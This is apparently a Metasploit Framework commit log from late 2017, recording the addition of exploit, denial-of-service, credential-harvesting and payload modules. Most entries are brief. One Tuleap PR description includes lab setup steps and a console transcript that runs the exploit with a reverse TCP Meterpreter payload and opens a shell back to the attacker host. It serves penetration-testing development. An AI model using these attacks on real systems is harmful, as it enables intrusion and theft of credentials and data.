e7a2dd2e71
fixed email
2017-12-11 23:20:46 -06:00
26e2eb8f1a
Changed to good ranking
2017-12-11 23:14:36 -06:00
9a6c54840b
Minor tweak to use vprint...
2017-12-11 16:48:47 -06:00
2d23054a1f
Changes as per comments
...
A few things were changed as per the PR comments:
1) The module title was reworded
2) The module description was multi-lined
3) Negative logic was rewritten to use 'unless'
4) Strings which did not require interpolation were rewritten
5) Documentation markdown was added.
2017-12-11 14:11:40 -06:00
f8977ed72c
added some fixes
2017-12-11 11:34:17 -06:00
c5f218c84c
Addressing comments
...
1. Updated documentation
2. Made the Sec-WebSocket-Key header a random value
2017-12-11 11:49:31 -05:00
e91830efe7
Add Dup Scout Enterprise login buffer overflow
2017-12-09 02:20:05 -06:00
cba5c7cb0f
Rename to actually call out the browser name
2017-12-08 13:53:13 -06:00
0a9dcafb77
Actually collect the creds, sort of
...
Instead of an alert() (which the attacker won't see), this collects the
offered credentials in a POST action, and displays them in the console.
This should further store the creds somewhere handy, but this is good
enough for now for testing from @RootUp
2017-12-08 13:51:02 -06:00
aee883a706
Fixed up description to be descriptive
2017-12-08 12:24:58 -06:00
604b949e23
Updated per review comments.
2017-12-08 10:42:43 -06:00
34ef650b0d
fixed up msftidy, opps.
2017-12-07 17:03:39 -06:00
75a82b3fe7
Advantech WebAccess webvrpcs ViewDll1 Stack-based Buffer Overflow Remote Code Execution Vulnerability
2017-12-07 16:34:26 -06:00
5a81f8091d
change some options for somethinf for sensible
2017-12-07 14:44:36 -05:00
335cc13cab
remove option, advanced Message seems to break it.
2017-12-07 14:17:14 -05:00
7bdc99a153
Fix HANDLER + some default options!
2017-12-07 13:53:39 -05:00
306c5d20d9
Adding ua_parser_js ReDoS Module
...
"ua-parser-js" is an npm module for parsing browser
user-agent strings. Vulnerable version of this module
have a problematic regular expression that can be exploited
to cause the entire application processing thread to "pause"
as it tries to apply the regular expression to the input.
This is problematic for single-threaded application environments
such as nodejs. The end result is a denial of service
condition for vulnerable applications, where no further
requests can be processed.
2017-12-07 10:25:29 -06:00
c992837f0d
Adding ws DoS module
...
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.
2017-12-07 10:45:57 -05:00
09aa433fdc
Add MESSAGE field for "obfuscation"
2017-12-07 08:04:31 -05:00
8bb6a8f47c
Rename office_dde_delivery to office_dde_delivery.rb
2017-12-06 22:40:37 -05:00
9d11c60d88
Office DDE Payload Delivery
...
Generate / Inject existing RTF files with DDE Payloads!
2017-12-06 21:41:00 -05:00
adba277be0
axe errant spaces at EOL
2017-12-04 16:57:48 -08:00
69b01d26bb
Land #9226 , Microsoft Office OLE object memory corruption
2017-12-04 16:50:27 -08:00
19b37c7070
Land #9263 , drb_remote_codeexec fixes
...
See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00
b13f4e25e1
thanks for making this well-known
2017-12-04 18:32:31 -06:00
a27bb38d51
add authors
2017-12-04 18:25:18 -06:00
b96dac28d5
fix info segment
2017-12-04 16:42:41 -05:00
f83e9815dd
Land #9210 , Add a Polycom HDX RCE
2017-12-04 12:49:35 -06:00
7edab268f5
handle case-insensitive password, fix received
2017-12-04 12:47:40 -06:00
06334aa2bd
Update polycom_hdx_traceroute_exec.rb
2017-12-04 11:05:01 -05:00
942e44ceae
Added local copies of the static content
2017-12-02 10:14:14 +01:00
4cbb5f2619
added new target
2017-12-01 18:35:45 -06:00
c79186593a
Update DiskBoss Module (EDB 42395)
...
Added a new target option for the
DiskBoss Server.
2017-12-01 15:08:57 -06:00
c788e4e540
Update office_ms17_11882.rb
2017-12-01 11:36:03 -05:00
7df46b33e8
disassembly ASM
2017-12-01 08:03:56 -05:00
1ced3994b0
Added more reference urls to wd_mycloud_multiupload_upload module.
2017-11-30 12:53:33 -06:00
b24f70c7c6
Update ssh_login.rb
...
Added credential data type so password is stored in creds.
2017-11-30 11:02:06 -06:00
c288dab338
fixup RHOST/RPORT expectations if only URI is set
2017-11-30 10:51:02 -06:00
d689b33d7e
more error handling, deal with user error
2017-11-30 08:31:13 -06:00
87e683c763
add back kill syscall for trap method
2017-11-30 08:12:15 -06:00
a0e0e1db15
allow manual targeting, handle errors better
2017-11-30 07:51:12 -06:00
eea72663b3
warn on method failure instead of error
2017-11-30 06:37:21 -06:00
9f12b794da
cleanup comments
2017-11-30 06:37:04 -06:00
5da34e8f2b
support RHOST/RPORT
2017-11-30 06:36:42 -06:00
59580195b4
resurrect old methods, try all 3
2017-11-30 06:16:05 -06:00
51a18b68fe
Land #9211 , handle 2016 DC's with hashdump gracefully
2017-11-29 17:26:33 -06:00
283b7c5145
Add WS-Discovery Information Discovery module
2017-11-29 12:21:22 +00:00
58897bf2fc
msftidy
2017-11-29 16:36:50 +08:00
7f1f7281f1
add local exploit for osx root login with no password
2017-11-29 16:06:02 +08:00
676a08b849
Update polycom_hdx_traceroute_exec.rb
2017-11-28 22:01:41 -05:00
2544b4d8db
Change target name
2017-11-28 21:39:04 -05:00
cb7f173811
Update office_ms17_11882.rb
2017-11-28 21:36:25 -05:00
d174ef3a70
Add wd_mycloud_multiupload_upload exploit
2017-11-28 07:12:00 -06:00
244acc48b6
Land #9212 , pfsense group member exec module
2017-11-27 11:27:29 -06:00
2c6cfabbc3
Land #8948 , allow configuring payload HTTP headers for domain fronting
2017-11-25 10:08:22 -06:00
8645a518b3
add mettle support for custom headers
2017-11-24 20:27:34 -06:00
0d79a3a3e2
Add support to Windows .NET Server
2017-11-23 08:35:55 -02:00
bfd5c2d330
Keep the initial option name 'ADMIN_ROLE'
2017-11-22 22:03:56 +01:00
778e69f929
Land #9229 , Randomize slowloris HTTP headers
2017-11-22 14:42:24 -06:00
ae43883e2b
Fix mongodb_login typo
2017-11-22 08:03:12 -05:00
960893b99d
change default payload
2017-11-22 06:36:46 -05:00
a02a02cb0c
Fixed URL...
2017-11-22 11:31:23 +01:00
d21d3c140e
Fixed date
2017-11-22 11:15:34 +01:00
916ee05cce
Add exploit module for Clickjacking vulnerability in CSRF error page pfSense
2017-11-22 11:06:22 +01:00
99555dde02
sleep! per feedback
2017-11-21 21:33:29 -05:00
5484ee840e
Correct port when eating cisco config
2017-11-21 18:09:51 -08:00
bdc822c67d
Improve logging when requesting config
2017-11-21 18:09:02 -08:00
5a358db260
Clean up shutdown messaging
2017-11-21 17:55:17 -08:00
93c424c255
Remove unused
2017-11-21 17:54:31 -08:00
b0d8b0a191
Clean up incoming file handling
2017-11-21 17:54:02 -08:00
879db5cf38
Land #9050 , @mpizala's improvements to the docker_daemon_tcp module
2017-11-21 17:13:24 -08:00
275f70e77e
better saving
2017-11-21 19:34:04 -05:00
db4c0fcca9
spelling
2017-11-21 19:02:14 -05:00
785e5944d6
Enhanced slowloris HTTP headers and minor cleanup
2017-11-21 18:19:20 -05:00
b6c81e6da0
Reimplement slowloris as external module
2017-11-21 16:21:01 -05:00
db2bd22d86
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
e07fe77a69
Close sockets to resolve file handle error
2017-11-21 15:49:45 -05:00
52f56527d8
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
74becb69e8
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
b7bc68c843
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
53123d92e2
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
21a6d0bd6e
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
60878215e0
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
9457359b11
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
29017b8926
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
f79b41edde
Slow Loris
2017-11-21 15:48:11 -05:00
a7932ffe0e
fix sizes
2017-11-21 14:31:14 -06:00
fcea6fd8d4
actually create new file ;-;
2017-11-21 15:00:06 -05:00
4050985649
update payloads
2017-11-21 13:53:33 -06:00
1fd7f7c8bc
prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
...
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
39a4d193a1
Create office_ms17_11882.rb
2017-11-21 14:47:02 -05:00
dd8238d146
rubocop got a donut
2017-11-20 20:08:28 -05:00
dd57138423
Make external module read loop more robust
...
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
cfd06ab24a
what was i thinking?
2017-11-20 16:08:48 -05:00
b6e2e2aa45
adjust delay
2017-11-19 09:43:18 -05:00
579d012fa2
spelling
2017-11-19 08:36:27 -05:00
b7f7afb3be
version detect, 2.2.6 handling
2017-11-19 08:28:07 -05:00
1087b8ca16
cleanup
2017-11-18 20:09:29 -05:00
35567e3e23
Fix - copy system:running-config tftp://ip/file
...
Copies running config directly to TFTP server, thus removing the need to delete the file :D.
2017-11-18 13:02:12 -05:00
f84f824a71
remove ?
2017-11-17 16:15:18 -05:00
b457c60542
WORK IN PROGRESS - "GET"
...
Work in progress of GET, and PUT. PUT works fine for grabbing the configuration. GET will be used for service a config to execute commands , or the also WIP action "UPLOAD"
2017-11-17 15:36:27 -05:00
2be3433bdb
Update references URLs
2017-11-17 13:27:35 +01:00
8b59c4615b
Update cisco_smart_install.rb
2017-11-17 07:09:41 -05:00
a636380e4b
Merge the new method into drupal_drupageddon.rb
2017-11-17 13:00:15 +01:00
704514a420
New exploit method for Drupageddon (CVE-2014-3704)
...
This new script exploits the same vulnerability as
*exploits/multi/http/drupal_drupageddon.rb*, but in a more efficient way.
2017-11-16 20:47:44 +01:00
feb24efd27
add DOWNLOAD action
...
Adds DOWNLOAD function, to download config and send to attacker TFTP server.
2017-11-16 12:58:54 -05:00
4a8d32af85
Update cisco_smart_install.rb
2017-11-16 12:53:27 -05:00
f8891952c6
pfsense group member exec module
2017-11-15 21:00:58 -05:00
c740f4369c
Land #9197 , Cleanup Mako Server exploit
2017-11-15 15:01:31 -06:00
4219959c6d
Bump ranking to Excellent
2017-11-15 15:00:47 -06:00
83c228f3b8
Make rubocop less mad
2017-11-15 14:06:36 -06:00
33a07beb30
Fix whitespace issues
2017-11-15 12:26:49 -06:00
829a7a53db
verbose response.
2017-11-15 12:27:40 -05:00
53a068d13f
Add error handling for failed hashdumps
2017-11-15 11:08:35 -06:00
8b9e091e70
remove humorous typo
2017-11-15 11:08:25 -06:00
7162765b57
load extapi in domain_hashdump
...
domain hashdump always needs to load extapi to work
2017-11-15 11:08:17 -06:00
ad98c9c156
fix Windows server 2016 support for domain_hashdump
...
The domain hashdump psot module should now work
against Server 2016 DCs.
2017-11-15 11:08:06 -06:00
4918e5856d
Update polycom_hdx_traceroute_exec.rb
2017-11-15 10:41:51 -05:00
d93120e2ac
Create polycom_hdx_traceroute_exec.rb
2017-11-15 10:40:57 -05:00
33e5508bcb
bypass user namespaces
2017-11-15 15:14:58 +01:00
54936b6ac3
Updatig documentation and tweaking initiate_session
2017-11-15 01:04:06 +03:00
86e47589b0
Add xplico remote code execution
2017-11-14 09:30:57 +03:00
d28ae361ca
Added exploit module for Samsung SRN-1670D vuln CVE-2017-16524
...
Please find my exploit module for the vulnerability CVE-2017-16524 I discovered and tested on Web Viewer 1.0.0.193 on SAMSUNG SRN-1670D
2017-11-12 20:11:44 +01:00
f3e2f4d500
Land #9167 , D-Link DIR-850L exploit
2017-11-10 18:15:39 -06:00
3936d3baa1
Clean up module
2017-11-10 18:15:22 -06:00
971ec80fc1
Keep the python target
2017-11-10 23:11:27 +01:00
df2b62dc27
Add Mako Server CMD injection Linux support, update docs, move to multi
2017-11-10 16:28:39 -05:00
ea260e87b7
Remove headers, since we didn't send them before
...
http was an invalid key for setting headers, and we still got a shell.
These headers also don't seem relevant to the PUT request.
2017-11-09 11:06:50 -06:00
7213e6cc49
Fix #9133 , makoserver_cmd_exec cleanup
2017-11-09 10:52:03 -06:00
500bde1150
get_vars tweak
2017-11-09 04:16:34 -05:00
52888871e3
Land #8747 RCE for Geutebrueck GCore on Windows
2017-11-08 20:22:54 -05:00
7ad151e68b
gcore formatting update
2017-11-08 20:21:40 -05:00
a04bc0a25b
Add get_vars, remove a https instance
2017-11-08 16:30:59 -05:00
39916ef61a
Land #9133 , Command injection in Mako Server examples
2017-11-08 15:11:01 -06:00
d95b333ae9
Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549.
2017-11-09 03:59:18 +11:00
b7c604f941
Land #9189 , s/patrick/aushack/g
2017-11-08 10:27:03 -06:00
5a07be9b96
Land #9041 , Add LPE on Windows using CVE-2017-8464
2017-11-08 10:09:03 -06:00
2f6da89674
Change author name to nick.
2017-11-09 03:00:24 +11:00
03cd8af29a
Update browser_sop_bypass.rb
2017-11-08 12:50:49 +05:30
0c247d5635
Update browser_sop_bypass.rb
2017-11-08 12:38:37 +05:30
0a4ce1e87b
cmdstager build
...
Removes the need for HTTP Server, utilizes helper CmdStager, reduces module size.
2017-11-07 19:00:59 -05:00
6683ba501f
added one missing change
2017-11-07 20:05:43 +01:00
8963d77bca
multiple changes as requested by h00die
2017-11-07 20:00:56 +01:00
fc87ee08d9
Land #9060 , IBM Lotus Notes DoS (CVE-2017-1130).
2017-11-07 11:20:12 -06:00
7173e7f4b4
Add CVE to module description
2017-11-07 11:05:14 -05:00
872894f743
Update browser_sop_bypass.rb
2017-11-07 21:29:16 +05:30
2fad61101e
Update browser_sop_bypass.rb
2017-11-07 21:13:06 +05:30
371f3c333a
This commit adds the jenkins_xstream_deserialize module
2017-11-07 09:46:42 -05:00
3dad025b8c
Create browser_sop_bypass.rb
2017-11-07 14:24:50 +05:30
88db98c381
Update ibm_lotus_notes2.rb
2017-11-06 20:45:50 +05:30
cfeb0b7bda
prefer threadsafe sleep here
2017-11-06 01:37:09 -06:00
897b5b5dd1
revert passive handler stance
2017-11-06 01:37:09 -06:00
77c13286e0
Ensure closing script tag has necessary escape.
2017-11-05 13:41:29 -06:00
7d1de9bc48
Fix removing the dropped files after exploitation
2017-11-04 18:50:20 -04:00
1758ed93d4
Update dlink_850l_unauth_exec.rb
2017-11-04 11:42:49 -04:00
724c5fb963
finish
2017-11-04 11:41:07 -04:00
e783cb59ea
add "check" & msftidy
2017-11-04 08:53:50 -04:00
84599ed3fc
Update dlink_850l_unauth_exec.rb
2017-11-04 07:58:13 -04:00
cddec8ca6c
download creds, stores in loot.
2017-11-03 14:24:45 -04:00
32a75e9782
Update dlink_850l_unauth_exec.rb
2017-11-03 09:02:48 -04:00
705c1cc6a7
Redo Functions
2017-11-03 08:33:42 -04:00
8c0da8ea90
Update dlink_850l_unauth_exec.rb
2017-11-03 06:24:07 -04:00
af583e843c
Update dlink_850l_unauth_exec.rb
2017-11-03 06:21:59 -04:00
697031eb36
mysql UDF now multi
2017-11-03 05:26:05 -04:00
5b7d803f85
Update dlink_850l_unauth_exec.rb
2017-11-02 15:57:03 -04:00
429ac71a63
header
2017-11-02 15:53:45 -04:00
61a67efb82
annnd....it sucks
2017-11-02 15:53:09 -04:00
70033e2b94
Enable the payload handler by default
2017-11-02 12:31:54 -04:00
a15b61a218
Fix #9160 , exploit method from TcpServer
...
It already starts the server and waits for us. This is what was called
when the module was still auxiliary.
2017-11-01 19:26:00 -05:00
87934b8194
Convert tnftp_savefile from auxiliary to exploit
...
This has been a long time coming. Fixes #4109 .
2017-11-01 17:37:41 -05:00
972f9c08eb
Land #9135 , peer print for jenkins_enum
2017-11-01 15:33:13 -05:00
77181bcc9c
Prefer peer over rhost/rport
2017-11-01 15:32:32 -05:00
0e66ca1dc0
Fix #3444/#4774, get_json_document over JSON.parse
...
Forgot to update these when I wrote new modules.
2017-11-01 15:05:49 -05:00
7a09dcb408
Fix #9109 , HttpServer (TcpServer) backgrounding
2017-11-01 13:35:04 -05:00
e3ac6b8dc2
Land #9109 , wp-mobile-detector upload and execute
2017-11-01 13:25:16 -05:00
3847a68494
Clean up module
2017-11-01 13:23:32 -05:00
7a21cfdfa6
add cached sizes for ppce500v2
2017-11-01 13:08:15 -05:00
0973bfb922
Update tuleap_rest_unserialize_exec.rb
2017-11-01 16:37:14 +01:00
6985e1b940
Add module for CVE-2017-7411: Tuleap <= 9.6 Second-Order PHP Object Injection
...
This PR contains a module to exploit [CVE-2017-7411](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7411 ), a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.
## Verification Steps
The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:
1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php ` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation ` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php ` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php ` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/ ` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5
NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".
## Demonstration
```
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[+] localhost:443 The target is vulnerable.
msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST 172.17.0.1
msf exploit(tuleap_rest_unserialize_exec) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56572) at 2017-11-01 16:07:01 +0100
meterpreter > getuid
Server username: codendiadm (497)
```
2017-11-01 16:09:14 +01:00
c36184697c
Merge pull request #9150 from bcook-r7/runtimeerror
...
Fix several broken raise RuntimeError calls in error paths
2017-10-31 14:47:42 -05:00
f1e6e7eed5
Land #9107 , add MinRID to complement MaxRID
2017-10-31 12:18:28 -05:00
aa0ac57238
use implicit RuntimeError
2017-10-31 04:53:14 -05:00
9389052f61
fix more broken RuntimeError calls
2017-10-31 04:45:19 -05:00
56eb828cc5
add e500v2 payloads
2017-10-30 14:04:10 -05:00
22f9626186
update sizes
2017-10-30 05:26:29 -05:00
9c16da9c98
Update ibm_lotus_notes2.rb
2017-10-28 18:53:15 +05:30
b96fa690a9
Add brackets to print functions
2017-10-27 15:23:22 -04:00
587c9673c6
Added host and port to output
...
I added the host and port number to reporting when instances are found.
2017-10-27 09:34:49 -07:00
037c58d1f6
wp-mobile-detector udpates
2017-10-27 10:10:04 -04:00
8613852ee8
Add Mako Server v2.5 command injection module/docs
2017-10-26 23:29:11 -04:00
cd755b05d5
update powershell specs for rex-powershell 0.1.77
2017-10-26 15:03:10 -05:00
43b67fe80b
remove errant bracket, formatting update
2017-10-26 15:01:53 -05:00
f2cba8d920
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
...
This restores the original PR
2017-10-25 16:29:11 -05:00
ca28abf2a2
Revert "Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)"
...
This reverts commit 4999606b614274b76473
2017-10-25 16:19:14 -05:00
0a858cdaa9
Revert "fix my comments from #8933"
...
This reverts commit 02a2839577
2017-10-25 16:13:00 -05:00
02a2839577
fix my comments from #8933
2017-10-25 14:46:41 -05:00
4999606b61
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
2017-10-25 12:44:04 -05:00
4274b76473
Land #9119 , Fix #8436 , allow session upgrading on meterpreter sessions
2017-10-25 10:26:27 -05:00
80aba7264c
Update ibm_lotus_notes2.rb
2017-10-25 10:33:25 +05:30
50c533a452
update cached sizes
2017-10-23 23:04:02 -05:00
19859f834d
re-add payload
2017-10-23 10:20:19 -04:00
df14dc4452
autodetection fixing
2017-10-23 09:07:46 +02:00
cd35ae4661
Land #9106 negear dgn1000 unauth rce module
2017-10-22 22:18:53 -04:00
210f6f80b7
netgear1000dng cleanup
2017-10-22 22:17:40 -04:00
eff94be951
Update netgear_dgn1000_setup_unauth_exec.rb
2017-10-22 16:55:40 -04:00
6f37bbb1d6
fix EDB
2017-10-22 16:11:19 -04:00
ca4feb5136
fix session upgrading
2017-10-23 01:26:45 +08:00
c7e35f885b
add disc date
2017-10-21 20:13:25 -04:00
e0831c1053
hopefully fix header..?
2017-10-21 18:38:32 -04:00
8239d28323
fix header
2017-10-21 09:07:18 -04:00
cfd7761818
wp_mobile_detector rce
2017-10-20 23:19:58 -04:00
40e508f2ad
correct mistake
2017-10-20 22:26:54 -04:00
ac21567743
Fix requested changes
2017-10-20 22:17:04 -04:00
8b8bebd782
remove payload
2017-10-20 20:27:15 -04:00
b255ddf8d6
New NETGEAR module
2017-10-20 20:25:11 -04:00
9658776adf
Land #9079 , adding @h00die's gopher scanner
2017-10-20 17:16:08 -07:00
2f371c9784
Netgear MODULE UNAUTH
2017-10-20 20:15:36 -04:00
2e376a1b6a
Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec
2017-10-20 20:13:29 -04:00
f250e15b6e
Land #9105 rename psh to polycom for name collision
2017-10-20 20:10:57 -04:00
fd028338e1
move psh to polycom so no more powershell name collision
2017-10-20 20:08:11 -04:00
5a6da487ab
Land #9043 two exploit modules for unitrends backup
2017-10-20 20:00:35 -04:00
5abdfe3e59
ueb9 style cleanup
2017-10-20 19:59:24 -04:00
c26779ef54
fixed msftidy issues
2017-10-20 14:39:39 -06:00
8f622a5003
Update ueb9_bpserverd.rb
2017-10-20 14:35:03 -06:00
cce7bf3e19
Update ueb9_bpserverd.rb
2017-10-20 14:33:46 -06:00
d715f53604
add MinRID to complement MaxRID, allowing continuing or starting from a higher value
...
from @lvarela-r7
2017-10-20 15:32:25 -05:00
85152b5f1e
added check function
2017-10-20 14:28:52 -06:00
e9ad5a7dca
Update ueb9_api_storage.rb
2017-10-20 14:05:15 -06:00
16b6248943
Update ueb9_bpserverd.rb
2017-10-20 13:58:12 -06:00
5c0bcd8f0a
Update ueb9_bpserverd.rb
2017-10-20 13:56:25 -06:00
abc749e1e8
Update ueb9_api_storage.rb
2017-10-20 13:48:29 -06:00
8febde8291
Update ueb9_api_storage.rb
2017-10-20 12:23:53 -06:00
664e774a33
style/rubocop cleanup
2017-10-20 09:44:07 -07:00
7cd532c384
Change targetr to target to fix small typo bug on one failure
...
The target object seems to have a typo where it is referred to as
“targetr” which I’d guess isn’t exactly what we’d like to do in this
case. So, I’ve changed that to “target” in order to work.
So, I’ve simply fixed that small typo.
2017-10-19 19:55:58 -04:00
04a24e531b
New module
2017-10-18 21:37:26 -04:00
7098372f58
Update shell_bind_tcp.rb
2017-10-17 19:33:10 -04:00
858bb26b56
Adding python/shell_bind_tcp, for an avaialable option
2017-10-17 07:36:45 -04:00
7e338fdd8c
Land #9086 , proxying fix for nessus_rest_login
2017-10-16 11:52:04 -05:00
df8261990d
Land #9085 , proxying fix for pop3_login
2017-10-16 11:38:24 -05:00
b04f5bdf90
Land #9077 , Enhancing the functionality on the nodejs shell_reverse_tcp payload.
2017-10-16 10:49:17 -05:00
9597157e26
Make nessus_rest_login scanner proxy-aware again
2017-10-14 11:16:41 +02:00
f4ae2e6cdc
Make pop3_login scanner proxy-aware again
2017-10-14 11:05:54 +02:00
9afc8b589c
Updating the payload sizes
2017-10-14 11:05:44 +05:30
c67a5872cd
Land #9055 , Add exploit for Sync Breeze HTTP Server
...
Land #9055
2017-10-13 17:34:03 -05:00
3a2c6128be
Support automatic targeting
2017-10-13 16:53:22 -05:00
a63c947768
gopher proto
2017-10-12 21:32:01 -04:00
9b219f42c5
Land #9029 , Fix Linux post module file assumptions
2017-10-12 17:56:40 -05:00
deb2d76678
Land #9058 , Add proxies back to smb_login
2017-10-12 17:31:45 -05:00
a0abffb6c4
Adding functionality of StagerRetryWait and StagerRetryCount
2017-10-12 22:25:00 +05:30
374c139d33
Increasing the functionality of the nodejs shell_reverse_tcp payload
2017-10-12 19:05:59 +05:30
294230c455
Land #8509 , add Winsxs bypass for UAC
2017-10-11 16:24:52 -05:00
cfaa34d2a4
more style cleanup for tomcat_jsp_upload_bypass
2017-10-11 15:53:35 -05:00
9885dc07f7
updates for style
2017-10-11 15:29:47 -05:00
1786634906
Land #9059 , Tomcat JSP Upload via PUT Bypass
2017-10-11 15:05:00 -05:00
b76c1f3647
remove invalid 'client' object reference in nodejs
...
fix #9063 by removing invalid object reference introduced in PR #8825
2017-10-11 11:09:28 -05:00
03e7797d6c
fixed msftidy errors and added documentation
2017-10-11 07:57:01 -04:00
e976a91b15
land #9053 RCE for rend micro imsva
2017-10-10 19:27:06 -04:00
a4bc3ea3c2
Merge branch 'pr9032' into upstream-master
...
Land #9032 , Improve CVE-2017-8464 LNK exploit
Land #9032
2017-10-10 17:11:51 -05:00
ab63caef7b
Land #9009 , Apache Optionsbleed module
2017-10-10 12:13:40 -05:00
57afc3b939
Land #9044 , Address generation issues with pure PSH payloads
2017-10-10 10:40:33 -05:00
2b85eb17dd
Create ibm_lotus_notes2.rb
2017-10-10 12:22:06 +05:30
fb16f1fbda
Disabling bind type payloads
2017-10-10 09:37:24 +03:00
facc38cde1
set timeout for DELETE request
2017-10-09 21:53:31 -04:00
850aeda097
land #9052 RCE of Trend Micro OfficeScan
2017-10-09 20:46:30 -04:00
a3d47ea838
Land #8989 , IBM Lotus Notes DoS (CVE-2017-1129)
2017-10-09 19:37:59 -05:00
fd8b72ca66
Minor tweaks.
2017-10-09 17:02:24 -05:00
15adb82b96
Make smb_login scanner proxy-aware again
2017-10-09 23:01:25 +02:00
a2d32b460c
Fixing grammer issue
2017-10-09 22:31:13 +03:00
c14c93d450
Integrate OfficeScan 11 exploitation and fix grammer issues
2017-10-09 22:11:42 +03:00
ef282ea154
Sync Breeze HTTP Server v10.0.28 BOF
...
Added support for v10.0.28 to Sync Breeze BOF module
2017-10-09 13:50:24 -04:00
fc5ab96ad6
Merging to prep for testing
...
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
7df18e378d
Fix conflicts in PR 8509 by mergeing to master
2017-10-09 10:30:21 -05:00
6d28a579f3
send_request_cgi instead of send_request_raw
2017-10-09 13:12:48 +02:00
be8680ba3d
Create tomcat_jsp_upload_bypass.rb
...
Created a module for CVE-2017-12617 which uploads a jsp payload and executes it.
2017-10-08 21:48:47 -04:00
395c82050b
Adding Trend Micro IMSVA Widget RCE
2017-10-08 18:15:32 +03:00
79c9123261
Adding Trend Micro OfficeScan widget rce module
2017-10-08 17:54:18 +03:00
33ec3c3d69
Error handling and style
2017-10-08 13:51:16 +02:00
d8ff99b1f6
Change to ARCH_X64, remove python dependency
2017-10-08 13:51:07 +02:00
7a87e11767
land #8781 Utilize Rancher Server to exploit hosts
2017-10-07 13:04:34 -04:00
b7184e87c0
fixing a type
2017-10-07 14:16:01 +02:00
8d50c34e4b
codefixing
2017-10-07 14:06:58 +02:00
34d119be04
Payload space, error handling and style"
2017-10-07 01:12:24 +02:00
d9e0d891a1
Land #9010 , Remove checks for hardcoded SYSTEM account name
2017-10-06 13:42:18 -05:00
7535fe255f
land #8736 RCE for orientdb
2017-10-06 14:35:42 -04:00
f996597bcf
update cached payload sizes
2017-10-06 13:19:00 -05:00
752d21e11c
forgot a comma
2017-10-06 10:47:42 -06:00
63e3892392
fixed issues identified by msftidy
2017-10-06 10:16:01 -06:00
78e262eabd
fixed issues identified by msftidy
2017-10-06 10:15:30 -06:00
36610b185b
initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478
2017-10-06 09:38:33 -06:00
770547269b
added documentation, and fixed 4 to 2 indentation
2017-10-06 15:39:25 +02:00
c701a53def
Land #9018 , Add Bind Shell JCL Payload for z/OS
2017-10-05 17:24:50 -05:00
7292ee24a2
Land #9027 , Cleanup revshell for zos
2017-10-05 17:20:01 -05:00
4a745bd2cc
Land #8991 , post/windows/manage/persistence_exe: fix service creation
2017-10-05 17:04:58 -05:00
9d2e8b1e4d
Land #8003 , Evasions for delivering nops/shellcode into memory
2017-10-05 16:44:36 -05:00
b7e209a5f3
Land #9033 , Geolocate API update
2017-10-05 16:39:09 -05:00
e4d99a14b6
